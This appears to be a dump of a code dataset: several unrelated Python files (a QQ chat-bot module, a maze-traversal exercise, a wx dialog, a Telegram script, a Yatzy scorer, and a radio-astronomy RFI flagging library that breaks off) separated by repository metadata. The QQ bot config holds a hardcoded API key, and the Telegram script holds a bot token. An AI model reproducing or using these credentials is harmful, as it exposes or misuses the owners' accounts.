fate_astro_list = ['摩羯座运势', '水瓶座运势', '双鱼座运势', '白羊座运势',\n '金牛座运势', '双子座运势', '巨蟹座运势', '狮子座运势',\n '处女座运势', '天秤座运势', '天蝎座运势', '射手座运势']\n\n turing_key = '41e97dbc8a92707d2a8fd29c3c443bde'\n\n\nclass Default:\n\n group_name = ''\n group_nickname = ''\n group_trigger = ''\n\n help = '''- 机器人还在测试中,可能发生错误或暴走,请多担待\\n- 如有问题请 @菜酱 反馈'''\n\n\nclass Standard:\n\n group_name = '可说呢!'\n group_nickname = '菜菜酱'\n group_trigger = '菜菜酱菜菜酱'\n\n help = '''- 菜菜酱还在测试中,可能发生错误或暴走,请多担待\\n- 如有问题请 @菜酱 反馈'''\n\n\nclass IMocca:\n\n group_name = '摩卡星座'\n group_nickname = '摩卡酱'\n group_trigger = '摩卡酱摩卡酱'\n\n help = '''- 摩卡酱还在测试中,可能发生错误或暴走,请多担待\n- 如有问题请 @菜酱 反馈\n- 直接在群内发送以下对应文字使用相关功能\n 1、生成星盘:\n 摩卡酱摩卡酱 生成星盘\n 2、星座匹配:\n 摩卡酱摩卡酱 星座匹配\n 3、星盘匹配:\n 摩卡酱摩卡酱 星盘匹配\n 4、今日运势(自行替换星座):\n 摩卡酱摩卡酱 白羊座运势\n- 更多功能正在开发中'''\n\n\nclass Utility:\n\n @staticmethod\n def get_fate(bot, contact, member, message):\n\n \"\"\" 读取今日运势 \"\"\"\n\n try:\n # 初始化日期和运势数据文件\n date = str(datetime.date.today())\n fate = Utility.load_json(Global.database_path + 'today.json')\n\n # 获取当天运势内容\n if fate:\n fate_today = fate[date]\n\n # 根据需要的星座返回内容\n if fate_today is not None and len(fate_today) != 0:\n # 获得星座编号\n i = str(Global.fate_astro_list.index(message))\n # 提取对应星座运势\n for astro in fate_today:\n if astro['xingzuo'] == i:\n score = '爱情:' + astro['LoveScore'] + ' 分, ' + \\\n '工作:' + astro['JobScore'] + ' 分, ' + \\\n '财富:' + astro['MoneyScore'] + ' 分, ' + \\\n '健康:' + astro['HealthScore'] + ' 分'\n return '@' + member.name + ' 今天的 ' + message + ':\\n' + astro['content'] + '\\n' + score\n\n # 当天运势未更新\n return '@' + member.name + ' 今天的 ' + message + ' 还没有更新'\n\n except Exception as e:\n print('[ERROR] GET_FATE: ' + str(e))\n return '@' + member.name + ' 今天的 ' + message + ' 出现错误'\n\n @staticmethod\n def roll(bot, contact, member, message):\n\n \"\"\" ROLL 点 \"\"\"\n\n try:\n message = str(message)\n\n # 如果无参数\n if len(message) == 0:\n return '@' + member.name + '\\nROLL 出 ' + str(random.randint(1, 100)) + ' 点'\n\n # 去掉 []\n message = message.replace('[', '')\n message = message.replace(']', '')\n\n # 分隔数组\n num = message.split('-')\n\n result = '@' + member.name + '\\nROLL 参数错误,ROLL[a-b] 可得到包含 a 和 b 之间的随机数'\n if len(num) == 2:\n a = int(num[0])\n b = int(num[1])\n result = '@' + member.name + '\\nROLL 出 ' + str(random.randint(a, b)) + ' 点'\n\n return result\n\n except Exception as e:\n print('[ERROR] ROLL:' + str(e))\n return '@' + member.name + '\\n' + 'ROLL 出现错误'\n\n @staticmethod\n def qin_dian(bot, contact, member, message, group_name, group_nickname):\n\n \"\"\" 钦点一人 \"\"\"\n\n try:\n\n # 违禁词检测\n for keyword in KalinaData.ban_word:\n if keyword in message:\n return ''\n\n # 获得当前群组对象\n group = bot.List('group', group_name)[0]\n # 获得群组内成员\n group_members = bot.List(group)\n # 得到昵称列表\n group_members = [str(m)[3:-1] for m in group_members]\n\n # print(group_members)\n\n # 尝试 10 次\n target = '[群主]'\n for i in range(10):\n # 随机一人\n target = random.choice(group_members)\n # 是自己\n if target != group_nickname:\n break\n\n return '@' + member.name + '\\n钦点了\\n@' + target + '\\n' + message\n\n except Exception as e:\n print('[ERROR] QINDIAN: ' + str(e))\n return '@' + member.name + '\\n' + '钦点出现错误'\n\n @staticmethod\n def turing(bot, contact, member, message):\n\n \"\"\" 聚合数据 问答机器人接口 \"\"\"\n\n try:\n # 限制信息 30 字符\n if len(message) > 30:\n return '@' + member.name + ' 发送消息不要超过 30 个文字或符号哦'\n\n # 将信息内容发送到接口\n url = 'http://op.juhe.cn/robot/index?info=' + urllib.parse.quote(message) + '&userid=' + str(member.uin) + '&key=' + Global.turing_key\n response = requests.get(url)\n\n # 处理返回结果\n if response.status_code != 200:\n return '@' + member.name + ' 连接第三方消息处理服务器失败'\n\n response = json.loads(response.text)\n\n if response['error_code'] != 0:\n return '@' + member.name + ' 不能处理的消息,错误码:' + str(response['error_code'])\n return '@' + member.name + ' ' + response['result']['text']\n\n except Exception as e:\n print('[ERROR] TURING: ' + str(e))\n return '@' + member.name + '\\n' + '问答出现错误'\n\n @staticmethod\n def read_file(filename):\n\n \"\"\" 读取文件 \"\"\"\n\n try:\n with open(filename, 'r') as file:\n\n contents = list()\n while True:\n content = file.readline()\n if content and len(content) > 0 and content != '\\n':\n content = content.replace('\\n', '')\n contents.append(content)\n else:\n break\n\n file.close()\n return contents\n\n except Exception as e:\n print('[ERROR] READFILE:' + str(e))\n return None\n\n @staticmethod\n def load_json(filename):\n\n \"\"\" 读取 JSON 文件 \"\"\"\n\n try:\n file = open(filename, encoding='utf-8')\n content = json.load(file)\n return content\n\n except Exception as e:\n print('[ERROR] LOADJSON:' + str(e))\n return None\n\n @staticmethod\n def save_file(filename, content, save_type):\n\n \"\"\" 保存文件 \"\"\"\n\n if len(content) == 0:\n return\n\n try:\n with open(filename, save_type) as file:\n file.write(content)\n file.flush()\n file.close()\n\n except Exception as e:\n print('[ERROR] SAVEFILE:' + str(e))\n","repo_name":"icaics/qqbot-gf-kalina","sub_path":"plugins/Define.py","file_name":"Define.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30914745675","text":"from room import Room\nfrom player import Player\nfrom world import World\n\nimport random\nfrom ast import literal_eval\n\n# Load world\nworld = World()\n\n\n# You may uncomment the smaller graphs for development and testing purposes.\n# map_file = \"maps/test_line.txt\"\n# map_file = \"maps/test_cross.txt\"\n# map_file = \"maps/test_loop.txt\"\n# map_file = \"maps/test_loop_fork.txt\"\nmap_file = \"maps/main_maze.txt\"\n\n# Loads the map into a dictionary\nroom_graph = literal_eval(open(map_file, \"r\").read())\nworld.load_graph(room_graph)\n\n# Print an ASCII map\nworld.print_rooms()\n\nplayer = Player(world.starting_room)\n\n# Fill this out with directions to walk\n# traversal_path = ['n', 'n']\ntraversal_path = []\n\n\nopposite_path = {'n': 's','e': 'w', 's': 'n','w': 'e'}\n\n# init graph\ngraph = {}\n\n# Int Queue \nclass Queue():\n def __init__(self):\n self.queue = []\n def dequeue(self):\n if self.size() > 0:\n return self.queue.pop(0)\n def enqueue(self, value):\n self.queue.append(value)\n def size(self):\n return len(self.queue)\n\ndef bfs(graph, starting_room):\n # Init queue\n q = Queue()\n # Store visited rooms\n visited = set()\n # Start path adding first vert to queue\n q.enqueue([starting_room])\n # If vert(s) in queue\n while q.size():\n # Remove first vert\n route = q.dequeue()\n # Get last vert added to path\n vertex = route[-1]\n # If vert unvisited, not in set()\n if vertex not in visited:\n # Mark vert visited, add to set()\n visited.add(vertex)\n # Look for unvisited adjacent verts\n for vert in graph[vertex]:\n # print(vert)\n # If unvisited verts found\n if graph[vertex][vert] == '?':\n # print(graph[vertex])\n # Return route\n return route\n\n for adjacent_verts in graph[vertex]:\n # Store adjacent verts\n surrounding_verts = graph[vertex][adjacent_verts]\n # !! New route \n new_route = list(route)\n # Add adjacent vert to new route\n new_route.append(surrounding_verts)\n # Enqueue route\n q.enqueue(new_route)\n\n# While no. of vertices are less than 500\nwhile len(graph) < len(room_graph):\n # Save vert id\n cur_vert_id = player.current_room.id\n # If vert id not in graph\n if cur_vert_id not in graph:\n # Put vert in graph\n graph[cur_vert_id] = {}\n # For all adjacent vertices\n for vert_exits in player.current_room.get_exits():\n # Set to ? while unvisited\n graph[cur_vert_id][vert_exits] = \"?\"\n\n for direction in graph[cur_vert_id]:\n # Break route if direction cannot be traversed\n if direction not in graph[cur_vert_id]:\n break\n # If direction can be traveled \n if graph[cur_vert_id][direction] == '?':\n # Set available vert as next direction\n available_vert = direction\n\n if available_vert is not None:\n # Add direction traveled to traversal_path\n traversal_path.append(available_vert)\n # Move to vertex\n player.travel(available_vert)\n # Set vertex id to the cur vertex\n new_vert_id = player.current_room.id\n # If new_vert_id not yet in graph \n if new_vert_id not in graph:\n # Add to graph \n graph[new_vert_id] = {}\n # For all unvisited adjacent verts\n for vert_exits in player.current_room.get_exits():\n # Set to ?\n graph[new_vert_id][vert_exits] = '?'\n # Set prev vert direction\n graph[cur_vert_id][available_vert] = new_vert_id\n # Set cur verts opposite direction\n graph[new_vert_id][opposite_path[available_vert]] = cur_vert_id\n # Set cur vert id to the new vert id\n cur_vert_id = new_vert_id\n\n vert_traversal = bfs(graph, player.current_room.id)\n # Store path of verts traversed\n if vert_traversal is not None:\n # For verts in vert_traversal\n for v in vert_traversal:\n # For all directions available for each vertex\n for vert_exits in graph[cur_vert_id]:\n # If vert_exit is vertex in vert_traversal\n if graph[cur_vert_id][vert_exits] == v:\n # Add vert_exits to traversal list\n traversal_path.append(vert_exits)\n # Move in that direction\n player.travel(vert_exits)\n # Update the current vert id to vertex just traversed\n cur_vert_id = player.current_room.id\n# TRAVERSAL TEST - DO NOT MODIFY\nvisited_rooms = set()\nplayer.current_room = world.starting_room\nvisited_rooms.add(player.current_room)\n\nfor move in traversal_path:\n player.travel(move)\n visited_rooms.add(player.current_room)\n\nif len(visited_rooms) == len(room_graph):\n print(f\"TESTS PASSED: {len(traversal_path)} moves, {len(visited_rooms)} rooms visited\")\nelse:\n print(\"TESTS FAILED: INCOMPLETE TRAVERSAL\")\n print(f\"{len(room_graph) - len(visited_rooms)} unvisited rooms\")\n\n\n\n#######\n# UNCOMMENT TO WALK AROUND\n#######\n# player.current_room.print_room_description(player)\n# while True:\n# cmds = input(\"-> \").lower().split(\" \")\n# if cmds[0] in [\"n\", \"s\", \"e\", \"w\"]:\n# player.travel(cmds[0], True)\n# elif cmds[0] == \"q\":\n# break\n# else:\n# print(\"I did not understand that command.\")","repo_name":"hoops92/Sprint-Challenge--Graphs","sub_path":"adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":5664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"12685651146","text":"# bplate\n# -*- coding: UTF-8 -*-\n\nimport wx\nfrom wx.lib.evtmgr import eventManager\nfrom ArtRegistry.ArtRegistry import ART\n\nfrom VersionReader import VERSION\n\nbragList = ['WitkoppenPR %s' % VERSION\n ]\n\nfrom pprint import pprint\n\n# ---------------------------- AboutDialog ---------------------------\n# ---------------------------- AboutDialog ---------------------------\n# ---------------------------- AboutDialog ---------------------------\nclass AboutDialog(wx.Dialog):\n def __init__(self, parent, ID):\n wx.Dialog.__init__(self, parent, ID,\n title = \"Witkoppen Patient Registry\",\n style=wx.DIALOG_MODAL|wx.CAPTION|wx.CAPTION)\n\n\n txtStr = \"\\n\".join(bragList)\n thetxt = wx.StaticText(self, -1, txtStr)\n \n okBtn = wx.Button(self, wx.ID_OK, \"OK\")\n eventManager.Register(self.ok, wx.EVT_BUTTON, okBtn)\n eventManager.Register(self.ok, wx.EVT_KEY_DOWN, okBtn)\n \n bmp = ART[\"48x48logo\"]\n Pic = wx.StaticBitmap(self,\n -1,\n bmp,\n size=(bmp.GetWidth(), bmp.GetHeight()))\n \n contentsBox = wx.BoxSizer(wx.HORIZONTAL)\n contentsBox.Add(Pic, 0, wx.ALIGN_CENTER|wx.ALL, 5)\n contentsBox.Add(thetxt, 1, wx.ALIGN_CENTER|wx.ALL, 5)\n\n allBox = wx.BoxSizer(wx.VERTICAL)\n allBox.Add(contentsBox, 1, wx.ALIGN_CENTER|wx.GROW|wx.ALL, 5)\n allBox.Add(okBtn, 0, wx.ALIGN_CENTER|wx.ALL, 5)\n\n allBox.Fit(self)\n self.SetSizer(allBox)\n self.SetAutoLayout(True)\n\n self.Centre(wx.BOTH)\n\n\n def ok(self, evt):\n self.EndModal(wx.ID_OK)\n \n","repo_name":"sthysel/witkoppen","sub_path":"src/Dialogs/AboutDialog.py","file_name":"AboutDialog.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"981350865","text":"import datetime\n\n\nclass Whale(object):\n From = str()\n To = str()\n Amount = int()\n AmountUsd = int()\n Symbol = str()\n Time = datetime.datetime\n IsUp = int()\n\n def __init__(self, fromm=None, to=None, amount=None, amountUsd=None, symbol=None, time=None, isUp=None):\n self.From = fromm\n self.To = to\n self.Amount = amount\n self.AmountUsd = amountUsd\n self.Symbol = symbol\n self.Time = time\n self.IsUp = isUp\n\n def __str__(self):\n isUp = str()\n if self.IsUp == 0:\n isUp = '|D|'\n elif self.IsUp == 1:\n isUp = '|U|'\n elif self.IsUp == 2:\n isUp = '|T|'\n return f'{isUp} From: {self.From} To: {self.To} |{self.Amount:,} : ${self.AmountUsd:,}| {self.Symbol} At: {self.Time}'\n","repo_name":"Yanalfard/binance-repo","sub_path":"Whale.py","file_name":"Whale.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31500253591","text":"import telegram\n\n\"\"\"\ntoken = 'bot token'\nbot = telegram.Bot(token=token)\n\n#생성한 텔레그램 봇 정보\nme = bot.getMe()\nprint(me)\n\n#생성한 텔레그램 봇 /start 시작 후 사용자 id 받아 오기\nchat_id = bot.getUpdates()[-1].message.chat.id\nprint('user id :', chat_id)\n\n#bot.sendMessage(chat_id='1710902272', text='안녕!!')\n\n# 오류가 나면 챗봇에 /start 실행\n\"\"\"\n\ntoken = \"1787374542:AAHTkUuO3qKc5HlczhsNwRkhYf1pycuncIY\"\nbot = telegram.Bot(token = token)\nupdates = bot.get_updates()\nfor u in updates:\n print(u.message['chat']['id'])","repo_name":"morethanmini/Notice_dongguk","sub_path":"telegram_bot_id.py","file_name":"telegram_bot_id.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74705317603","text":"class Score:\r\n def __init__(self):\r\n pass\r\n\r\n def ones(self, dice_list):\r\n \"\"\"\r\n Function checks ones.\r\n -- Update result\r\n -- Return result\r\n \"\"\"\r\n result = 0\r\n for index, number in enumerate(dice_list):\r\n if number == 1:\r\n result +=1\r\n return result\r\n\r\n def twos(self, dice_list):\r\n \"\"\"\r\n Function checks twos.\r\n -- Update result\r\n -- Return result\r\n \"\"\"\r\n result = 0\r\n for index, number in enumerate(dice_list):\r\n if number == 2:\r\n result +=2\r\n return result\r\n\r\n \r\n def threes(self, dice_list):\r\n \"\"\"\r\n Function checks threes.\r\n -- Update result\r\n -- Return result\r\n \"\"\"\r\n result = 0\r\n for index, number in enumerate(dice_list):\r\n if number == 3:\r\n result +=3\r\n return result\r\n\r\n def fours(self, dice_list):\r\n \"\"\"\r\n Function checks fours.\r\n -- Update result\r\n -- Return result\r\n \"\"\"\r\n result = 0\r\n for index, number in enumerate(dice_list):\r\n if number == 4:\r\n result +=4\r\n return result\r\n\r\n def fives(self, dice_list):\r\n \"\"\"\r\n Function checks fives.\r\n -- Update result\r\n -- Return result\r\n \"\"\"\r\n result = 0\r\n for index, number in enumerate(dice_list):\r\n if number == 5:\r\n result +=5\r\n return result\r\n\r\n def sixes(self, dice_list):\r\n \"\"\"\r\n Function checks sixes.\r\n -- Update result\r\n -- Return result\r\n \"\"\"\r\n result = 0\r\n for index, number in enumerate(dice_list):\r\n if number == 6:\r\n result +=6\r\n return result\r\n\r\n def house(self, dice_list):\r\n \"\"\"\r\n Function checks house.\r\n -- Update result\r\n -- Return result\r\n \"\"\"\r\n dice_list.sort()\r\n result = 0\r\n if (dice_list[0] == dice_list[1] == dice_list[2] and dice_list[3] == dice_list[4]\r\n or dice_list[0] == dice_list[1] and dice_list[2] == dice_list[3] == dice_list[4]):\r\n for die in dice_list:\r\n result += die\r\n return result\r\n return False\r\n\r\n def yatzy(self, dice_list):\r\n \"\"\"\r\n Function checks yatzy, all dice are the same.\r\n -- Return bool\r\n \"\"\"\r\n dice_list.sort()\r\n if len(set(dice_list)) == 1:\r\n return True\r\n return False","repo_name":"asksimon/yatzy_game","sub_path":"score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31085821430","text":"# HRK 2023\n#\n# Hans-Rainer Kloeckner\n# hrk@mpifr-bonn.mpg.de \n#\n# this is a first attemp to a RFI library to\n# handle bad data in a waterfall spectrum\n#\n# Hope you enjoy it\n# \n# --------------------------------------------------------------------\n\n\nimport numpy as np\nimport numpy.ma as ma\nfrom copy import deepcopy\nfrom scipy.signal import convolve2d\n\n\ndef data_stats(data,stats_type='mean'):\n \"\"\"\n return mean and derivation of the input data\n \"\"\"\n\n if stats_type == 'mad':\n #\n from astropy.stats import mad_std, median_absolute_deviation\n #\n data_mean = median_absolute_deviation(data)\n data_std = mad_std(data)\n\n elif stats_type == 'median':\n data_mean = np.median(data)\n data_std = np.std(data)\n\n elif stats_type == 'kdemean':\n data_mean,data_std = kdemean(data,accucary=1000)\n\n else:\n data_mean = np.mean(data)\n data_std = np.std(data)\n\n\n return data_mean, data_std, stats_type\n\n\ndef boundary_mask_data(data,reference_data,sigma,stats_type='mean',do_info=False):\n \"\"\"\n use upper and lower thresholds to mask out data\n data is a unflagged (e.g. compressed dataset)\n reference_data original data\n\n \"\"\"\n\n # determine the mean and std of the data\n #\n data_mean,data_std,stats_type = data_stats(data,stats_type)\n\n # selecing all data within the boundaries ion\n #\n select = np.logical_and(reference_data > data_mean - sigma * data_std, reference_data < data_mean + sigma * data_std)\n\n # Note in NUMPY MASKED arrays a bolean value of True (1) is considered to be masked out\n #\n # default all data is bad\n #\n data_shape = np.array(reference_data).shape\n mask = np.ones(data_shape)\n\n # so good data is indicated by zero \n #\n mask[select] = 0\n\n if do_info:\n print('data ',np.cumprod(data_shape)[-1],' markes as bad ',np.cumprod(data_shape)[-1]-np.count_nonzero(select))\n \n return mask.astype(bool)\n\n\n\ndef complete_fg_mask(mask,axis=0,percentage=0,complete_boundary=9):\n \"\"\"\n Assuming a waterfall spectrum (frequencey(x-axis) versus time(y-axis)) \n check the appearance of masking in time or channel (need to do axis 0)\n and determine if the entire channel or time should be masked\n completes_boundary up to X pixles\n\n assuming that True (masked) is bad data\n \"\"\"\n\n new_mask = deepcopy(mask.astype(int))\n\n max_fg = new_mask.shape[axis]\n fg_sum = mask.sum(axis=axis)/max_fg\n\n select = fg_sum >= percentage/100.\n fg_axis = np.arange(len(fg_sum))\n complete_fgs = fg_axis[select]\n\n if axis == 0:\n for fgc in range(len(complete_fgs)-1):\n if complete_fgs[fgc+1] - complete_fgs[fgc] < complete_boundary: \n new_mask[:,complete_fgs[fgc]:complete_fgs[fgc+1]] = 1\n else:\n for fgc in complete_fgs:\n if complete_fgs[fgc+1] - complete_fgs[fgc] < complete_boundary: \n new_mask[complete_fgs[fgc]:complete_fgs[fgc+1],:] = 1\n\n return new_mask.astype(bool)\n\n\ndef smooth_kernels(smk_type):\n \"\"\"\n \"\"\"\n # ----------------------------------------------\n #\n # here are some examples of kernels for an ambitions user that may want to play with it\n #\n if smk_type == 'box':\n kernel = [[1,1,1],[1,1,1],[1,1,1]] # boxcar\n if smk_type == 'cross':\n kernel = [[0,1,0],[1,1,1],[0,1,0]] # cross\n if smk_type == 'robx':\n kernel = [[1,0],[0,-1]] # Roberts operator di/dx \n if smk_type == 'roby':\n kernel = [[0,1],[-1,0]] # Roberts operator di/dy\n if smk_type == 'scharrx':\n kernel = [[-3,0,3],[-10,0,10],[-3,0,3]] # Scharr operator di/dx\n if smk_type == 'scharry':\n kernel = [[3,10,3],[0,0,0],[-3,-10,-3]] # Scharr operator di/dy\n if smk_type == 'sobelx':\n kernel = [[-1,0,1],[-2,0,2],[-1,0,1]] # Sobel operator di/dx\n if smk_type == 'sobely':\n kernel = [[1,2,1],[0,0,0],[-1,-2,-1]] # Sobel operator di/dy\n if smk_type == 'canny':\n kernel = [[2,4,5,4,2],[4,9,12,9,4],[5,12,15,12,5],[4,9,12,9,4],[2,4,5,4,2]] \n if smk_type == 'prewittx': \n kernel = [[-1,0,1],[-1,0,1],[-1,0,1]] # Prewitt operator di/dx\n if smk_type == 'prewitty':\n kernel = [[1,1,1],[0,0,0],[-1,-1,-1]] # Prewitt operator di/dy\n\n #ddxxfilter = [[1,-2,1]] # differential\n #ddyyfilter = [[1],[-2],[1]] # differential \n #dddxyfilter = [[-1/4.,0,1/4.],[0,0,0],[1/4.,0,-1/4.]] # differential \n #\n\n return kernel\n\n\ndef apply_multiple_magnitude_convolutions(data,data_mask,kernels,sigma,stats_type):\n \"\"\"\n apply multiple convolutions\n \"\"\"\n\n merged_data = np.zeros(data_mask.shape)\n\n for k in kernels:\n\n if isinstance(k, str):\n sm_kernel = smooth_kernels(k)\n else:\n sm_kernel = k\n\n # convolution image with filter kernel\n #\n conv_data = convolve2d(data,sm_kernel,mode='same',boundary='symm')\n merged_data += conv_data**2 \n\n merged_data = np.sqrt(merged_data)\n\n conv_data_masked = ma.masked_array(merged_data,mask=data_mask,fill_value=np.nan)\n\n new_mask = boundary_mask_data(conv_data_masked.compressed(),merged_data,sigma,stats_type,do_info=False)\n\n return new_mask\n\n\n\ndef apply_multiple_convolutions(data,data_mask,kernels,sigma,stats_type):\n \"\"\"\n apply multiple convolutions\n \"\"\"\n\n new_mask = np.zeros(deepcopy(data_mask).shape).astype(bool)\n\n nmasks = []\n for k in kernels:\n\n # Check kernel\n #\n if isinstance(k, str):\n # get the smooth kernel\n sm_kernel = smooth_kernels(k)\n else:\n sm_kernel = k\n\n # convolution image with filter kernel\n #\n conv_data = convolve2d(data,sm_kernel,mode='same',boundary='symm')\n conv_data_masked = ma.masked_array(conv_data,mask=new_mask,fill_value=np.nan)\n #\n nmasks = boundary_mask_data(conv_data_masked.compressed(),conv_data,sigma,stats_type,do_info=False)\n\n new_mask = combine_masks(new_mask,[nmasks])\n\n return new_mask\n\n\n\n\ndef mask_2d_convolve(data,data_mask,smooth_kernel,sigma,stats_type):\n \"\"\"\n CAUTION: data needs to be zero patted for the FFT treatment by numpy\n \"\"\"\n\n # convolution f with g can also be seen as the Multiplication of their Fourier components:\n #\n # Fourier pairs (convolution =*, multiplication = x): f * g = F(f) x F(g)\n # F(f x g) = F(f) * F(g)\n # Mask_Array = Array x Mask\n # \n # Convolving a masked array with a filter: Mask_Array * Filter = F(Mask_Array) x F(Filter) = F(Array x Mask) x F(Filter) = (F(Array) * F(Mask)) x F(Filter) \n #\n # So essentially to do a convolution of a masked array you need to first convolve the unmasked array with the mask and multiply it with the\n # Fouriertransform of the Filter.\n\n\n # convolution image with filter kernel\n #\n conv_data = convolve2d(data,smooth_kernel,mode='same',boundary='symm')\n conv_data_masked = ma.masked_array(conv_data,mask=data_mask,fill_value=np.nan)\n\n new_mask = boundary_mask_data(conv_data_masked.compressed(),conv_data,sigma,stats_type,do_info=False)\n\n return new_mask\n\n\n\ndef convolve_1d_data(data,smooth_type='hanning',smooth_kernel=3):\n \"\"\"\n \"\"\"\n from scipy.signal import wiener,gaussian,medfilt,convolve\n from scipy.signal.windows import hamming #, hanninng #hanning,convolve,hamming,gaussian,medfilt\n\n\n if smooth_type == 'hamming':\n sm_kernel = hamming(smooth_kernel)\n sm_data = convolve(data,sm_kernel,mode='same') / sum(sm_kernel)\n\n elif smooth_type == 'gaussian':\n sm_kernel = gaussian(smooth_kernel,smooth_kernel)\n sm_data = convolve(data,sm_kernel,mode='same') / sum(sm_kernel)\n\n elif smooth_type == 'median':\n sm_data = medfilt(data,smooth_kernel)\n\n elif smooth_type == 'wiener':\n sm_data = wiener(data,smooth_kernel)\n\n else:\n sm_data = deepcopy(data)\n\n return sm_data\n\n\ndef mask_convolve(data,data_mask,smooth_type='hanning',smooth_kernel=3,sigma=3,stats_type='mean',do_info=False):\n \"\"\"\n basic flagging applies scipy filter function to the data \n \"\"\"\n from scipy.signal import wiener,hanning,convolve,hamming,gaussian,medfilt\n\n\n # get a smooth spectrum\n #\n sm_data = convolve_1d_data(data,smooth_type,smooth_kernel)\n\n\n # here divide the original data with the smoothed one\n n_data = data/sm_data\n n_data_masked = ma.masked_array(n_data,mask=data_mask,fill_value=np.nan)\n \n # get the new mask\n #\n new_mask = boundary_mask_data(n_data_masked.compressed(),n_data,sigma,stats_type,do_info=False)\n\n return new_mask\n\n\n\ndef scipy_masking(data,masktype='triangle',window_size=101):\n \"\"\"\n \"\"\"\n\n mask = np.zeros(np.array(data).shape).astype(bool)\n\n if masktype == '':\n return mask.astype(bool)\n\n if masktype == 'triangle':\n from skimage.filters import threshold_triangle\n\n thresh_triangle = threshold_triangle(data)\n select = data > thresh_triangle\n\n\n if masktype == 'sauvola':\n from skimage.filters import threshold_sauvola\n\n thresh_sauvola = threshold_sauvola(data)\n select = data > thresh_sauvola\n\n\n if masktype == 'niblack':\n from skimage.filters import threshold_niblack\n\n thresh_niblack = threshold_niblack(data, window_size=window_size)\n select = data > thresh_niblack\n\n if masktype == 'niblack':\n from skimage.filters import threshold_sauvola\n\n thresh_sauvola = threshold_sauvola(data, window_size=window_size)\n select = data > thresh_sauvola\n\n\n if masktype == 'local':\n from skimage.filters import threshold_local\n\n thresh_local = threshold_local(data, block_size=window_size)\n select = data > thresh_local\n\n mask[select] = True\n\n return mask.astype(bool)\n\n\ndef kdemean(x,accucary=1000):\n \"\"\"\n use the Kernel Density Estimation (KDE) to determine the mean\n \n (http://jpktd.blogspot.com/2009/03/using-gaussian-kernel-density.html )\n \"\"\"\n from scipy.stats import gaussian_kde\n from numpy import linspace,min,max,std,mean\n from math import sqrt,log\n \n if mean(x) == std(x):\n print('kde mean = std')\n return(mean(x),std(x))\n\n max_range = max(np.abs([min(x),max(x)]))\n\n # create instance of gaussian_kde class\n gk = gaussian_kde(x)\n\n vra = linspace(-1*max_range,max_range,accucary)\n vraval = gk.evaluate(vra)\n\n # get the maximum\n #\n x_value_of_maximum = vra[np.argmax(vraval)]\n\n # Devide data\n difit = vraval / max(vraval)\n #\n # and select values from 0.5\n sel = difit >= 0.4999\n\n idx_half_power = list(difit).index(min(difit[sel]))\n\n if idx_half_power >= accucary -1:\n return(mean(x),std(x))\n\n delta_accuracy = max([abs(vra[idx_half_power-1] - vra[idx_half_power]),\\\n abs(vra[idx_half_power+1] - vra[idx_half_power])])\n\n fwhm = abs(x_value_of_maximum - vra[idx_half_power])\n\n\n # factor 2 is because only one side is evaluated\n sigma = 2*fwhm/(2*sqrt(2*log(2)))\n\n # safety net\n # is the KDE is not doing a good job\n #\n if sigma > std(x):\n return(mean(x),std(x))\n\n return(x_value_of_maximum,abs(sigma)+delta_accuracy)\n\n\n\ndef combine_masks(mask,listofmask):\n \"\"\"\n combine mask of a list with an input mask\n \"\"\"\n new_mask = deepcopy(mask.astype(bool))\n #\n for k in range(len(listofmask)):\n new_mask = np.logical_or(new_mask,listofmask[k].astype(bool))\n\n return new_mask\n\n\ndef difference_mask(mask,orgmask):\n \"\"\"\n difference mask between mask and orgmask\n \"\"\"\n \n new_mask = deepcopy(mask).astype(bool)\n\n equal_mask = np.logical_and(mask.astype(bool),orgmask.astype(bool))\n\n new_mask[equal_mask] = False\n\n return new_mask\n\n\ndef recover_coordinante_mask(mask,axis0,axis1,concat_freq_per_sw,concat_chan_per_sw,info_fg_str=''):\n \"\"\"\n return the coordinates of the data\n \"\"\"\n \n mask_int = mask.astype(int)\n fg_mask_0,fg_mask_1 = np.nonzero(mask_int)\n\n mask_ccords = []\n for c in range(len(fg_mask_0)):\n obs_time = axis0[fg_mask_0[c]]\n obs_freq = axis1[fg_mask_1[c]]\n obs_freq_sw = concat_freq_per_sw[fg_mask_1[c]]\n obs_chan_sw = concat_chan_per_sw[fg_mask_1[c]]\n mask_ccords.append([obs_time,obs_freq,obs_chan_sw,obs_freq_sw,info_fg_str])\n\n return mask_ccords\n\n\ndef mask_into_spwd(final_mask,concat_time,concat_freq,concat_freq_per_sw,concat_chan_per_sw):\n \"\"\"\n convert the data back into spectral windows\n \"\"\"\n\n # Number of spwds\n #\n spwds = int(concat_freq_per_sw[-1] + 1)\n\n\n if spwds > 1:\n #\n # reshape the mask into spwd,time,frequncy\n #\n data_shape = final_mask.shape\n mask_spwd = final_mask.reshape((data_shape[0],spwds,int(data_shape[1]/spwds)))\n mask_spwd = np.moveaxis(mask_spwd,0,1)\n #\n concat_freq_per_sw_spwd = concat_freq_per_sw.reshape((spwds,int(data_shape[1]/spwds)))\n concat_chan_per_sw_spwd = concat_chan_per_sw.reshape((spwds,int(data_shape[1]/spwds)))\n concat_freq_spwd = concat_freq.reshape((spwds,int(data_shape[1]/spwds)))\n\n else:\n mask_spwd = final_mask \n concat_freq_per_sw_spwd = concat_freq_per_sw\n concat_chan_per_sw_spwd = concat_chan_per_sw\n concat_freq_spwd = concat_freq\n \n return mask_spwd,concat_freq_spwd,concat_time,concat_freq_per_sw_spwd\n\n\ndef interpolate_mask_data(data_x,data_y,org_data_x,mask):\n \"\"\"\n \"\"\"\n from scipy.interpolate import CubicSpline\n from scipy.interpolate import pchip_interpolate\n\n\n # get the bondaries for not fitting the edges\n #\n get_outer_bondaries = [np.min(list(np.argwhere(mask == 0))),np.max(list(np.argwhere(mask == 0)))]\n\n # optain good data\n 